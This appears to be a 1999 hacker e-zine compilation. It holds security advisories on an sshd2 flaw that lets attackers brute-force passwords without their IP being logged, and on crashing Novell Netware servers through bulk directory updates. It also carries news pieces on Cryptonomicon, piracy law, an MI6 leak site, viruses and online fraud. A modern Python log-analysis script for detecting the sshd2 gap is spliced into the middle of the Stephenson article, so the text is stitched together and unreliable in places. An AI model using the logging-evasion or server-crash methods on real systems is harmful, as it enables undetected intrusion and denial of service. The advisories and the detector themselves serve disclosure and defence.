Application: sshd2 up to 2.0.11
OS: Unix
Risk: Risky :), long term could gain system access.

-=-=-=-=-=-=-=-=
Introduction
-=-=-=-=-=-=-=-=

In the default installation of sshd2 (up to 2.0.11) there is an open way to brute-force a login/password without any kind of IP logging by the sshd. Version 2.0.12 and newer seem not to be vulnerable to this attack, because they log the IP at connection time.

-=-=-=-=-=-=-=-=
Details
-=-=-=-=-=-=-=-=

When an ssh client connects to the daemon, it has a number (default is three) of attempts to guess the correct password before disconnecting. If we shut down the connection before using up the number of attempts, the daemon will log neither the connection, the password guesses nor the IP of the client. One crystal clear example:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
Disconnected; authentication error.
[zhodiac@piscis zhodiac]$

In /var/log/messages:

May 9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')'

Now we try the bug:

[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$ ssh -l zhodiac piscis
zhodiac's password:
zhodiac's password:
zhodiac's password:
FATAL: Received signal 2.
[zhodiac@piscis zhodiac]$

Those "FATAL: Received signal 2." are the response to interrupting the program with a ^C. Let's see what syslog did:

May 9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
May 9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
May 9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.

No IP, no password guess attempts in the logs! So a brute force can be done without any kind of logging... Sorry script-kiddies, no program available!

-=-=-=-=-=-=-=-=
Quick Fix
-=-=-=-=-=-=-=-=

Edit the file sshd2_config (usually at /etc/ssh2) and set the value of "PasswordGuesses" to 1. With this, each time a password is tried it will be logged in the following way:

May 9 12:46:07 piscis sshd[1308]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1527', requested service 'ssh-connection')'

It is also recommended to set the value of "ListenAddress" so we will have more control over which IPs can use our ssh service.

A better solution is to upgrade to version 2.0.12 or newer; with those, at connection time it will log via syslog in the following way:

May 9 15:23:33 piscis sshd2[7184]: connection from "192.168.1.1"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
zhodiac@jjf.org
http://www.jjf.org
- J.J.F. / Hackers Team - Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

@HWA

43.0 Neal Stephenson's new book "Cryptonomicon"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

‘Cryptonomicon’: Turning point for cult author
Neal Stephenson embarks on multi-novel epic journey
By Alan Boyle
MSNBC
May 12

The Hacker Hemingway looks the part: In his publicity photo, he strikes a cross-armed pose in goatee, close-cropped hair and shades. But Cryptonomicon author Neal Stephenson, a family man pushing 40 as well as a leading light in cyberpunk lit, jokes that his image could use an overhaul. "I may have to lose the goatee," he says.

ALONG WITH the comparisons to Ernest Hemingway and Thomas Pynchon, Stephenson has won praise for his fanciful visions of not-all-that-distant technological futures.
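An added example for the sshd2 logging gap in the J.J.F. advisory above (section 42.0), not code from the advisory or from any SSH implementation: this Python script parses syslog lines in the format the advisory shows, separates authentication failures (which name a client address) from the address-less "Remote host disconnected" entries that a connection closed before PasswordGuesses is used up leaves behind, and flags any time window holding a burst of the latter. The sample log lines, the log year (syslog omits it) and the window and threshold values are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample input modelled on the syslog excerpts in the advisory:
# one normal three-guess failure (which names the client address) followed
# by a run of connections closed before the guess limit was reached.
SAMPLE_LOG = """\
May  9 12:42:53 piscis sshd2[1391]: User authentication failed: 'Authentication method disabled. (user 'zhodiac', client address '192.168.1.1:1344', requested service 'ssh-connection')'
May  9 12:44:41 piscis sshd2[1403]: Remote host disconnected: Connection closed.
May  9 12:44:44 piscis sshd2[1405]: Remote host disconnected: Connection closed.
May  9 12:44:47 piscis sshd2[1407]: Remote host disconnected: Connection closed.
May  9 12:44:50 piscis sshd2[1409]: Remote host disconnected: Connection closed.
May  9 12:44:53 piscis sshd2[1411]: Remote host disconnected: Connection closed.
May  9 13:10:02 piscis sshd2[1500]: Remote host disconnected: Connection closed.
"""

# Classic syslog prefix "Mon dd HH:MM:SS host sshd2[pid]: message" (no year).
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd2?\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
ADDR_RE = re.compile(r"client address '(?P<ip>[^':]+):\d+'")
LOG_YEAR = 1999  # assumed: syslog omits the year, the sample is dated May 1999


def parse_line(line, year=LOG_YEAR):
    """Return {'ts', 'pid', 'kind', 'ip'} for an sshd2 syslog line, else None."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    msg = m["msg"]
    rec = {"ts": ts, "pid": int(m["pid"]), "kind": "other", "ip": None}
    if msg.startswith("User authentication failed"):
        addr = ADDR_RE.search(msg)
        rec["kind"] = "auth_failed"
        rec["ip"] = addr["ip"] if addr else None
    elif msg.startswith("Remote host disconnected"):
        # sshd2 <= 2.0.11 records nothing else for these: no user, no address.
        rec["kind"] = "disconnect"
    return rec


def find_unattributed_bursts(log_text, window=60, threshold=3):
    """Bucket address-less disconnects into fixed windows and flag busy ones.

    Returns [{'window_start': iso8601, 'count': n}, ...] for every window of
    `window` seconds that holds at least `threshold` disconnect entries with
    no client address, i.e. activity the daemon could not attribute to an IP.
    """
    base = datetime(LOG_YEAR, 1, 1)  # fixed origin keeps bucketing timezone-free
    buckets = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["kind"] == "disconnect" and rec["ip"] is None:
            offset = int((rec["ts"] - base).total_seconds()) // window
            buckets[offset] += 1
    bursts = []
    for offset in sorted(buckets):
        if buckets[offset] >= threshold:
            start = base + timedelta(seconds=offset * window)
            bursts.append({"window_start": start.isoformat(), "count": buckets[offset]})
    return bursts


def attributed_failures(log_text):
    """Count authentication failures that did name a client address, per IP."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["kind"] == "auth_failed" and rec["ip"]:
            counts[rec["ip"]] += 1
    return dict(counts)


if __name__ == "__main__":
    print("attributed failures:", attributed_failures(SAMPLE_LOG))
    for b in find_unattributed_bursts(SAMPLE_LOG):
        print(f"{b['count']} address-less disconnects starting {b['window_start']}")
```

With PasswordGuesses set to 1 or sshd2 2.0.12+, the same activity produces per-connection entries carrying the client address, and the address-less bucket stays empty.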
In his 1992 novel Snow Crash, he depicted a virtual-reality realm called the Metaverse, which seemed to presage the rise of Internet culture. In 1995, Diamond Age blended neo-tribalism with nanotechnology and an almost Big Brotherly global communications network. All this has brought Stephenson a loyal following among computer adepts and led Newsweek to use the Hacker Hemingway tag. His book is on Amazon.com’s top-10 list.

But during a book-tour interview, Stephenson confessed that he was sometimes uncomfortable with his hacker-cult status. "I find that the standard attitude of young people now -- people in high school, in college, in their 20s -- is this image of hip, jaded, ultracool detachment," he said. "I’ve noticed that there are a fair number of people like that who assume I’m one of them. I’m actually not. I actually find people like that kind of annoying."

PAST AND PRESENT

Cryptonomicon may mark a turning point for Stephenson. "One of the things I developed a reputation for with the other books was speculating about future technologies, good or bad," he acknowledged. "And readers who come to ‘Cryptonomicon’ looking for that kind of thing aren’t going to get it."

Unlike the futuristic Snow Crash or Diamond Age, Stephenson’s latest work focuses on the past and a plausible present: the battles over secret codes in World War II, modern-day deals to create data havens and, of course, heroes who uncover a dark conspiracy that bridges the decades. It’s a cross between Raiders of the Lost Ark and The X-Files, weighing in at 918 pages.

The length isn’t the only thing imposing about Cryptonomicon: The book’s huge cast includes historical figures such as code-breaking mathematician Alan Turing and Army Lt. Ronald Reagan. Characters expound upon the intricacies of high-tech business plans and Cap’n Crunch cereal. But most of all, the novel revolves around cryptography: keeping secrets and unlocking them.
In fact, Cryptonomicon boasts a how-to appendix that, by some accounts, would violate encryption export laws if it were transmitted abroad electronically. The appendix on the Solitaire encryption algorithm, which uses a deck of cards rather than a computer to encode secret messages, was written by Bruce Schneier, author of Applied Cryptography.

Stephenson himself is well-versed in the mysteries of software code but doesn’t profess to be a crypto expert. "I tried to keep it real as much as I could," Stephenson said. "There are places where the book deviates somewhat from complete technical accuracy. I actually posted a little FAQ document specifically aimed at people who know about crypto, because I know people who know crypto are going to see some things that I glossed over."

DEALING WITH CELEBRITY

Over the years, Stephenson has dealt with more than one bout with cyber-lebrity, and he says his experience is serving him in good stead this time around. He’s avoiding broadcast interviews on this tour, since he says "all of my most horrifying experiences on the last tour were trying to explain my book on television."

He also manages to keep his public life separate from his private life. He quickly declines to discuss the effect of cyclical fame on his family in Seattle, and he’s reluctant to talk about the grander meanings behind his writing. "If I try to stand outside of it and encapsulate my own themes, it would ruin it for me because I would be way too self-conscious, and it would ruin it for readers, too," he said.

All in all, he sounds as if he’s anxious for the book tour’s end, so he can get back to work. "I have to have a lot of privacy, a lot of quiet, a minimum of distractions to do what I do," he said. "When it’s over, it’s really over. As soon as I finish this thing, I go into a total media blackout for years."
As fat as Cryptonomicon is, Stephenson still had to leave out some of the plot threads he was hoping to follow, and he says those tales will be told in his next novel, a sequel of sorts.

"The funny thing about writing books is that the stuff that’s out where people can see it is a year or two behind the stuff that you’re doing at the moment," he said. "And if things are going right, the stuff you’re doing at the moment seems a lot better. That’s one of the ways of trying to avoid getting a swelled head."

@HWA

44.0 Novell Netware 4.0 advisory by Nomad Mobile Research Center
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Novell Netware 4.x Vulnerable
contributed by Simple Nomad

The Nomad Mobile Research Center has released an advisory that says that under certain conditions, Novell Netware 4.x is vulnerable to a denial of service that can crash multiple servers. According to Novell, the latest Service Pack will correct the problem.

The Nomad Mobile Research Center
http://www.nmrc.org/news/tts.txt

_______________________________________________________________________________

                        Nomad Mobile Research Centre
                              A D V I S O R Y
                                www.nmrc.org

Simple Nomad [thegnome@nmrc.org]                                      12May1998
_______________________________________________________________________________

Platform    : Netware 4.x
Application : NDS
Severity    : High

Synopsis
--------

It is possible to overflow the Transaction Tracking System (TTS) built into Novell Netware and possibly crash multiple servers.

Tested configuration
--------------------

The testing was done with the following configuration:

Netware 4.11, Service Pack 5B
Also confirmed on Netware 4.1.
All systems had 64MB RAM and 1 GB drive space.

Bug(s) report
-------------

The Transaction Tracking System (TTS) is used by Novell Netware to help preserve the integrity of data during a system crash.
If a transaction is in the process of being written to the hard drive when the system crashes, upon reboot the partial transaction is backed out, preserving the integrity of the original data. Administrators can optionally flag a file with the TTS flag to add this protection (typically done with databases, especially those that have no rollback features).

TTS by default tracks 10,000 transactions, and each instance uses a small amount of memory. If a burst of transactions is sent to the server and the available memory is exhausted, TTS will disable. While TTS is disabled, no updates can be made to Netware Directory Services. This can impact any program or process that updates NDS, such as login. In extreme overrun cases, such as very large simultaneous (or near simultaneous, actually) transactions, memory will be depleted quickly enough to crash the server.

This is not entirely uncommon, as any large burst of traffic updating NDS will cause the problem, such as bringing up a server after several days of downtime that has a Directory Services replica on it. Normally this can be corrected by increasing RAM or lowering the amount of transactions tracked from the maximum default of 10,000 down to, say, 5,000 by issuing the command SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling TTS by typing ENABLE TTS at the console.

However, a malicious user with proper access can force the memory depletion and potentially crash a server that has a replica of the NDS database. This can lead to multiple near-simultaneous server crashes. Of course anyone with administrative access can do this, but they could obviously do other acts that could be just as destructive, if not more so.

What is needed is the ability to create a large number of NDS updates very quickly. For example, if a user has the ability to create a container and add objects to it, then that user has enough authority to potentially cause problems to TTS.
Creating a container, dropping a few hundred objects into the container via drag-and-drop and then deleting the container should suffice. If the server lacks a large amount of free memory, the server will quite possibly abend. In other cases, TTS is disabled, which is a form of Denial of Service. As the messages are sent across to other servers containing NDS replicas, they too may crash. In our test environment we were able to crash two servers (Netware 4.1 and Netware 4.11) with the scenario of creating a container, adding a few hundred users, and then deleting the container.

Solution/Workaround
-------------------

NMRC has heard reports of as many as a dozen servers crashing within a couple of minutes of each other, so apply the latest Service Pack for Netware 4.x on all servers or upgrade to Netware 5.

Comments
--------

Novell has already been notified and they are obviously aware of the TTS limitations (refer to the May 1997 TID 2908153 at http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example). Per Novell the latest patches for Netware 4.x correct the problem, and Netware 5 does not have the problem at all.

Thanks to Michel Labelle for notifying NMRC about this problem.
_______________________________________________________________________________

@HWA

45.0 Penalties for Pirates may increase
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Penalties for Pirates May Increase
contributed by 1Di3h

A hearing of the House Judiciary Committee heard testimony from the FBI, the Department of Justice, and numerous software companies supporting proposed legislation that would toughen the penalties for makers and distributors of illegal copies of software.

Wired
http://www.wired.com/news/news/politics/story/19659.html

Stiffer Fines Due for Pirates?
by Heidi Kriz
3:00 a.m. 13.May.99.PDT

One out of four business software applications is pirated.
So testified Tim Starback, director of marketing for digital font maker Emigre, at a Wednesday hearing of the House Judiciary Committee that addressed digital copyright violations.

The company joined other software publishers, as well as the FBI and the Department of Justice, in supporting proposed legislation that would toughen the penalties for makers and distributors of illegal copies of software.

"It's time for Congress to make the pirates pay," said Ken Wasch, president of the Software & Information Industry Association (SIIA).

Wednesday's testimony to the Subcommittee on Courts and Intellectual Property sought to advance two agenda items. Industry reps praised proposed amendments to the current Copyright Act, introduced yesterday by Representative James Rogan (R-California) and Representative Howard Coble (R-North Carolina). They also sought to hurry along implementation of the Clinton administration's 1997 No Electronic Theft Act (NET). The latter legislation is managed by a sentencing commission, but no commissioners have been appointed to staff it.

The proposed amendments, known as the Copyright Damages Improvement Act of 1999, seek to increase fines in the cases of copyright violations. The current range of statutory damages, which dates to 1988, varies from US$500 to $20,000, according to Dan Duncan, vice president of government affairs for the SIIA. Tuesday's legislative amendments propose increasing that penalty to between $750 and $30,000 -- a figure the industry group said is based on actual damages and lost profits. In cases of willful infringement, the new ceiling of damages would be raised from its current level of $100,000 to $150,000.

Witnesses sought to persuade Congress to clarify sentencing guidelines for criminal copyright infringements under the NET Act.
Should the legislation pass a subcommittee vote, it will then move on to a vote in the House Judiciary Committee, and then to a House vote. Duncan said that House members had expressed a desire to vote on the amendments before the upcoming congressional recess, which starts after Memorial Day.

Not everyone is raving about the proposed stiffer penalties. An MIT computer-science student who goes by the name Phat Boy said that the fines would punish those who simply share unlicensed software over the Net as much as those who seek to sell it.

Phat Boy cited the case of "LaMacchia," a fellow MIT student who in 1994 was fingered by authorities for posting licensed programs on the Net. Under the new rules, he would be fined hundreds of thousands of dollars, according to Phat Boy.

"Why should that kind of act -- maybe ill-advised, but certainly perpetrated in the generous, shareware spirit -- be punished with the same ferocity as a corporate pirateer [would be]?" said Phat Boy.

@HWA

46.0 British Spy's site shutdown on Geocities?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/

Spy's site shut down
Astral 13.05.1999 12:00

The free webhosting service GeoCities has shut down a former British spy's site because he was threatening to expose global illegal acts by British intelligence. The site was taken down at the end of April. What secrets was he about to reveal? Story from ZDNet.

GeoCities Downs Spy Site

The free webhosting service GeoCities has shut down a former British spy's site. What secrets was he about to reveal?

How far can the influence of British intelligence reach? Today it reached half way around the world to shut down a California-based website that allegedly revealed the identities of Her Majesty's secret agents.

Richard Tomlinson used to be an agent for the British government. Ousted in 1995, Tomlinson was then imprisoned in 1997 for violating a British official secrets act.
After his release, he reportedly ended up in Switzerland, where he started a website claiming global illegal acts by British intelligence. The site was taken down at the end of April; Swiss authorities say Tomlinson had threatened to publish British secrets online, and they had to shut him down to prevent that.

Last week, Tomlinson put up a new site through the free Web-hosting service GeoCities. This time, he allegedly said he was going to release sensitive details about where British intelligence offices are located. That new site has now been suspended.

Bruce Zanca, the vice president of communications at GeoCities, says that it was simply a matter of policy. "People [complete] a questionnaire and agree to no illegal activities and no hate speech. It was brought to our attention that there were content violations; we put the site under suspension."

He added, "We're careful in protecting privacy for our users, so I can't get into details, but it fell under the general content restrictions."

Next steps? "[Tomlinson] is free to [dispute the shut down] and if so, we'll start a dialog with him. If the site is brought into compliance, we'll put the website back up."

Sunday Times (UK)
May 13 1999

BRITAIN
Government fears that rogue website might put lives at risk, writes Michael Evans

MI6 agent list published on the Internet

URGENT legal moves were ordered yesterday after an American website published the names of a "large number" of serving MI6 intelligence officers.

Ministry of Defence officials learnt of the new Internet website yesterday morning and immediately contacted Rear Admiral David Pulvercraft, Secretary of the Defence, Press and Broadcasting Advisory Committee - the D Notice Committee - to try to prevent publication of any of the names by the British media.

The list of MI6 names and other details about the intelligence service were regarded as a serious security breach.
Admiral Pulvercraft, who has no powers to stop newspapers publishing sensitive material, advised that publication of such details could "put lives at risk". He said that there was concern that the "long list" may have been put on the Internet by a former member of the Secret Intelligence Service.

Last week the Government took out a court injunction in Switzerland against Richard Tomlinson, the former MI6 officer who was sacked from the service and was subsequently sentenced to 12 months in prison for breaching the Official Secrets Act. The injunction prevented Mr Tomlinson, who now lives in Geneva, from disclosing any information about his past employment by MI6. The injunction covered disclosure anywhere in the world and included information put on the Internet.

The American website makes no mention of Mr Tomlinson, and there is no evidence that he set it up himself. However, it was clear to Government lawyers that information on the website had come from Mr Tomlinson. The website refers to a disaffected MI6 officer.

John Wadham, his lawyer, said that he had threatened to put such information on the Internet. He said Mr Tomlinson felt he had been "harassed around the world", and this was why he may have decided to take such action.

Mr Tomlinson has also indicated that he still hoped to publish a book. It was his attempt to sell his MI6 memoirs to an Australian publisher that led to his arrest and trial at the Old Bailey. He pleaded guilty to breaching the Official Secrets Act and was released from jail in April last year.

Although the Chief of the Secret Intelligence Service, known as "C", currently Richard Dearlove, is formally named by the Government on his appointment, no other members of the service are ever officially identified. Under Defence Advisory Notice No 6, editors of newspapers are asked to seek advice from the D Notice Secretary before publishing such details "unless they have been widely disclosed or discussed".
Admiral Pulvercraft made clear yesterday that the identities of so many MI6 officers had not been previously disclosed, and he asked that the address of the website should not be published. Steps were being taken to see how the damage arising from the disclosure of the MI6 names could be minimised.

Admiral Pulvercraft had to decide whether to make an issue of the case, knowing that by doing so he was drawing attention to the fact that a website had been set up. He said yesterday that even if the website was only short-lived, he felt it was necessary to put out an advisory notice.

@HWA

47.0 The Virus Hype, Fact or Fiction by Thejian
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

THE VIRUS HYPE: FACT OR FICTION?
by BHZ, Thursday 13th May 1999 on 9:48 pm CET

Viruses are common threats to all computer users, from exe infectors to new-age macro viruses. Our new special report goes deeper into viruses. You can read about "White Hats" and "Black Hats", media hype, myths and of course solutions. So if you are interested, read the new Special Report.

The Virus-hype: Fact or fiction?

By now we've probably all heard of the term "computer virus". After all the panic first caused by Melissa and followed up by the CIH 1.2 Chernobyl virus, mainstream computer users now know (if they didn't know it already) one of the threats of the "Information Age" by name. It's nice that we can all copy and download programs and files from the Internet and from each other's systems, but there are certain safety risks involved here. They have always been there btw, we just needed a little push to get the media coverage going. But how bad is it really? Every major online news service (and a lot of their printed colleagues too) have reported about the menace the computer virus presents and they did a good job scaring the crap out of the clueless regular computer users, but how much of these stories is really true? And what is yet to come?
Let's get something straight first: the first goal of most newspapers and online news services IS profit. They just need to sell. As do the antivirus developers. This was demonstrated nicely in December last year, when the Remote Explorer virus hit the network of MCI Worldcom. Eventually it was proven to be an attempt at vengeance by one of the company's ex-employees. But by then the media machine of AV developer Network Associates had sadly labeled this virus, which spread through the Win NT networks of the company encrypting and resizing data files, as one of the worst viruses ever. This turned into just another marketing trick, in the hope of selling their fix, which was miraculously discovered only a week after NA and the media had convinced the public that this was the big one. It's sad to see how some companies can put their name out to dry just to gain some more profit, but it's even sadder to see how easily some journalists take over such a story to sell a few more papers or a little more advertising.

Viruses just scare the crap out of the regular user because he doesn't know much on the subject. Let's look at where viruses come from, for example. The main opinion on virus writers and the virii scene (VX) is almost one of hate. "Those rotten low-life computer geeks who are only out for one thing: complete and utter destruction of one's data!" This view just shows how misinformed some people are. Of course there are some people out there who are really devoted to destruction, but they're to be found in every field. The effect some viruses have, combined with the feeling of helplessness the average Joe feels when infected by one, is one of the primary causes of this. The press can be named as another, but probably one of the biggest enemies here is the lack of knowledge on the matter. Don't get me wrong, I don't condone virus writing in any way, I just don't condemn it either.
One huge point is forgotten by people who discuss this topic like the sky is going to fall down. Computer viruses may cause damage, but they have brought on immense technological development. I'd rather have some "bad guys" and also a lot of "good guys" who research and cooperate with each other in this field and in this way help develop methods to protect my PC than have the scene go completely underground, leaving the AV researchers only with the opportunity to research a virus when it starts spreading. Think about it. I don't want to come 'round quoting Confucius to y'all, but a doctor that cures when an illness starts to spread will of course get more fame than one that prevents the illness at the first signs. But which one would you prefer to be treated by? The one that lets you get sick first or the one that cures you at the first detection?

The virus writers' community is split (like the general hacking community) into two camps. They refer to themselves as "Black Hats" and "White Hats". The "Black Hats" are mostly interested in doing damage and sometimes release viruses through e-mail or Usenet newsgroups. Though there have been a lot of discussions on this subject, virus writing (leaving out the macro viruses here) requires a great amount of skill. A lot of the people who develop and research viruses could be called "hackers" instead of "vandals", for what they do is aimed at technological progress and certainly does not always have to do with destruction of data. This is proven by the fact that the majority of computer viruses never make it "into the wild". They reside only in virus libraries kept by writers and researchers. The claim that there are thousands of viruses around nowadays is, when you look at the above, just not accurate either. People who make these claims almost certainly work for the AV companies or simply don't know what they're talking about.
AV companies count even the most insignificant variations of known viruses as new ones for advertising purposes. Most viruses are just variations on the same virus, sometimes differing in only one symbol in its code or message (instead of "legalize" a variation of the good old Marijuana virus later contained the word "legalize", is this a new virus???). In general AV software is able to detect such variations on its own nowadays and the few really new ones are quickly added to upgrades which every user can simply download from the manufacturer's site. Sure, you can never detect all of them in time and sometimes data is lost, but virus scanners could detect CIH 1.2 even before it struck on the 26th of April and these technologies are still advancing rapidly.

Another myth is the one that you can only get viruses by downloading from BBSs and the Internet. In fact, this is one of the least common ways of infection. Most sites nowadays use strict policies to make sure you won't get infected through anything you've downloaded there. It can happen sometimes of course, but I've never heard one of my friends complaining about this. A big chunk of the online infection problem lies within e-mail, which spreads mostly macro viruses. One of the main sources of viruses nowadays is the demand for more functions in our software, like the Corel or Microsoft Office scripting languages. WordBasic is a nice example of this. This microprogramming language, which is part of the Microsoft Office package, allows a user to add new functions (in the form of macros) to their copies of Word, Access or Excel. Problem is that only a select group of users knows how to use this. Among them are the macro virus writers. The Melissa macro virus is a nice recent example of this. Is it really necessary to have a zillion more functions if this opens up just as many new ways to attack one's data?
Besides downloading and employees holding a grudge, one of the main problems lies with the retail packages themselves. Besides some bugs and copy protections gone bad, a lot of viruses are spread directly from the companies that might seem to be victims. For example, IBM recently recalled a shipment of Aptivas which were infected with the CIH virus. Due to the monopolizing of certain lines of software using the above-mentioned scripting languages, the problem caused by this spreads. Also, with the development of new functions and technologies within vulnerable packages, even more new sources for virii come into existence every day.

"So the next generation viruses will be even more destructive?", you might ask. I think the last two months have shown that. First we had the Melissa virus. All major companies shut down their networks to keep from being infected and once again all AV developers and journalists jumped on the virus subject. Only to have the "plague" called Melissa overshadowed by a new one called CIH 1.2 a couple of weeks later. Where Melissa (and her variations) just caused a lot of extra e-mail traffic, CIH 1.2 attacked the (flash) BIOS and the HDs themselves. After his arrest (and release) the creator of the virus even told the press about two more destructive viruses he was working on! If you combine this with the Chaos Virus Theory, which predicts the advancement of future virus generations to intelligent, thinking and self-evolving viruses, the question arises how we can ever prevail against these evil menaces?

At the danger of sounding like I'm downplaying or underestimating the problem, I think we shouldn't panic too much on the subject though. Like I mentioned before, AV research makes a lot of progress. This is mainly because of the cooperation between AV companies and the virus creators. If you start a manhunt on the latter, the former will be left empty-handed.
The only way we will notice the new discoveries in this field then is by the time they've infected half the Internet. Of course we should be aware of certain elements in this scene, the ones insisting on inflicting damage and aiming for "Internet anarchy". You can't judge a group of people by a (relatively small) segment of that group. Now the FBI is shutting down virii sites like Codebreakers. From one point of view this is necessary and only a logical step. While I agree that steps should be taken to prevent the kiddies from downloading virus sources to impress their friends and in this way (intended or not) spread another infection, we shouldn't forget the fact that the only way to keep up and be able to actively and effectively combat this menace is by working together. We should beware not to force the "underground" to really go underground.

Viruses present a very real threat, but don't get sucked into the hype. For all our sakes.

Thejian
Help Net Security
http://net-security.org

48.0 The Internet Fraud Council
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

THE INTERNET FRAUD COUNCIL
by BHZ, Thursday 13th May 1999 on 4:23 pm CET

Computer fraud costs the industry billions of dollars. Finally US authorities created The Internet Fraud Council, a coalition of a few companies that fight computer crime. They said that they will give their "Seal of approval" to companies that are fraud-free. Officials at the electronic crime center also announced yesterday a new FBI Internet Fraud Complaint Center, which will collect complaints from across the country. Read the whole article on CNET.

Council formed to fight Net fraud
By Reuters
Special to CNET News.com
May 11, 1999, 8:55 a.m. PT

ORLANDO, Florida--With fraud on the Internet shaping up as the multibillion-dollar crime of the 1990s, U.S. authorities and antifraud groups yesterday launched fresh initiatives to combat Net crime.
The Internet Fraud Council, a coalition of antifraud companies, said it will create a set of standards for companies doing business on the Internet, a clearinghouse of information on online crime, and a fraud-free "seal of approval" for such businesses operating in cyberspace.

"It's hard for law enforcement to keep up," John Hiatt, president of the National Coalition for the Prevention of Economic Crime, said at a news conference during a meeting on economic crime. "The bandits change hardware and software every six months. In law enforcement, that number is 48 months," he said.

Paul Fichtman, chairman of the Internet Fraud Council, said estimates of the cost of Internet fraud ranged from $9 billion to $108 billion in 1998. "Clearly, there's no way anyone can estimate the amount of fraud on the Internet," he said. The Internet Fraud Council also said it would create a clearinghouse for information about online fraud.

Most Internet crime involves the theft of identifying information, such as credit card or social security numbers from individual consumers. But thieves also steal corporate identities, posing as news services or financial analysts in order to float false reports that can send a stock soaring or plummeting. In April, an Internet posting of a false financial news story sent shares of PairGain Technologies, a small California company, soaring 31 percent, only to fall back to earth when the story proved false.

"The Internet is quickly becoming a primary communications and e-commerce tool," said Norman Willox, chief executive of the National Fraud Center, a white-collar antifraud firm and one of the partners in the Internet Fraud Council. "Fraud on the Internet is increasing exponentially. Existing efforts [to fight it] have been so specialized or fragmented that they have been ineffective."

Officials at the electronic crime center also announced yesterday a new FBI Internet Fraud Complaint Center, which will collect complaints from across the country.
Willox said he expects the two centers to work together closely. "Right now there's no tool that measures the loss from economic crime on the Internet," he said. "It doesn't matter which organization is first to the scene of the crime as long as they share information."

"What we want to do is give people tools that make it too expensive for these guys to be fraudulent," Fichtman said. "If we can do that, they'll leave the Internet and go somewhere else."

@HWA

49.0 Credit Card fraud under watchful eyes of eFalcon 'electronic brain'
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EFALCON PREYS ON CREDIT FRAUD (BUS. 3:00 am)
http://www.wired.com/news/news/email/explode-infobeat/business/story/19662.html

It's an open secret that the Web is still the Wild West for credit-card crooks. HNC Software hopes its new anti-fraud software, eFalcon, will change that. By Craig Bicknell.

EFalcon Preys on Credit Fraud
by Craig Bicknell
3:00 a.m. 13.May.99.PDT

You may not know it, but the last time you used your credit card to buy a sporty new shirt at the mall, you probably had to get the nod from a big brain named Falcon. A big electronic brain, that is.

For the last six years, Falcon, software based on neural networks, has been analyzing the purchasing patterns of more than 260 million credit cards. Over time, it has learned to spot the telltale signs of fraud. Before most credit-card processors authorize a charge, they first get Falcon's OK.

HNC Software, the creator of Falcon, hopes that online merchants will soon start doing the same. This week, the company launched eFalcon, a form of Falcon tweaked to detect the credit fraud that's so rampant online.

See also: Credit Card Fraud Bedevils Web

"Fraudulent transactions may exceed 10 percent of e-commerce merchant revenues.... That's a huge problem," said HNC chief Robert North. In comparison, fraudulent sales account for less than 1 percent of traditional retail revenues.
Credit-card company rules mandate that Web merchants, not consumers, pick up the tab for bogus charges, plus a US$25 fee. It's a big strain for a fledgling e-commerce company.

EFalcon will help merchants spot potentially fraudulent transactions in a couple of different ways. When a user enters a credit-card number on a Web site, the number and information about the proposed purchase are zipped off to the Falcon database. There, the data will be assessed against the purchase history on the card and scored for likelihood of fraud.

EFalcon bases the score on hundreds of factors, including the amount of purchase, the type of merchandise and store, the time since last purchase, and the location of the surfer's computer. If eFalcon has never seen the card before, it will generate a score based on the average buying patterns of all cardholders.

The higher the score, the more likely the purchase is fraudulent. Merchants decide what the cutoff score will be for accepting a transaction.

EFalcon will also take into account the way a surfer moves around the merchant's site. For example, a bona fide shopper is likely to linger before making a purchase, while a crook heads straight for the Buy button.

Analysts who've taken a look at eFalcon are impressed. "I think it's going to be a big success," said Avivah Litan, research director for payment systems at Gartner Group. "They've got a lot of experience dealing with fraud in the physical world."

That is also its limitation, said William Donahoo, vice president of marketing at CyberSource, a competing firm that also makes fraud detection software for the Web. Unlike HNC, CyberSource has been making anti-fraud software for the Web exclusively, since the earliest days of e-commerce.

"The difference between the online world and the brick-and-mortar world is night and day," said Donahoo. "We're a fraud system built by the Internet and for the Internet." Still, he's glad to see HNC entering the market.
